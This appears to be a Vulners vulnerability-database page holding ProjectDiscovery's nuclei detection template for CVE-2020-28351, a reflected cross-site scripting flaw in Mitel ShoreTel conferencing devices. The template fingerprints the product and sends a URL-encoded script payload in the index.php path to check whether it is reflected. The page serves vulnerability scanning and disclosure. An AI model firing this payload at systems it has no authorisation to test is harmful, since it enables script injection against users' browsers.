Lucene search
K

Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

Mitel ShoreTel 19.46.1802.0 Devices- Cross-Site Scripting CVE-2020-28351 vulnerability. Unauthenticated attacker can conduct XSS attacks via PATH_INFO variable in index.php leading to arbitrary script execution in victim's browser

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Mitel ShoreTel conferencing component cross-site scripting vulnerability
12 Nov 202000:00
cnvd
CVE
CVE-2020-28351
9 Nov 202003:58
cve
Cvelist
CVE-2020-28351
9 Nov 202003:58
cvelist
Exploit DB
ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting
10 Nov 202000:00
exploitdb
EUVD
EUVD-2020-20812
7 Oct 202500:30
euvd
NVD
CVE-2020-28351
9 Nov 202004:15
nvd
OSV
CVE-2020-28351
9 Nov 202004:15
osv
Packet Storm
ShoreTel Conferencing 19.46.1802.0 Cross Site Scripting
10 Nov 202000:00
packetstorm
Prion
Cross site scripting
9 Nov 202004:15
prion
RedhatCVE
CVE-2020-28351
22 May 202516:17
redhatcve
Rows per page
id: CVE-2020-28351

info:
  name: Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by Mitel to mitigate the XSS vulnerability.
  reference:
    - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
    - https://www.mitel.com/articles/what-happened-shoretel-products
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28351
    - http://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
    - https://github.com/dievus/cve-2020-28351
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-28351
    cwe-id: CWE-79
    epss-score: 0.15987
    epss-percentile: 0.96508
    cpe: cpe:2.3:h:mitel:shoretel:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mitel
    product: shoretel
    fofa-query: body="ShoreTel" && icon_hash="268280373"
  tags: cve,cve2020,shoretel,xss,mitel,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/server-common/cgi-bin/login"

    stop-at-first-match: true
    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "Mitel Networks Corporation"
          - "ShoreTel"
        case-insensitive: true
        condition: or
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100913c1fa47b073efaf10e5f658bc994cb46b6526ee7e1274f2968bd31bfb6c9ad022002d50ec6f5a92f82225dcf7aee13ed332e8e055a58a4f629eafec83308bd1996:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation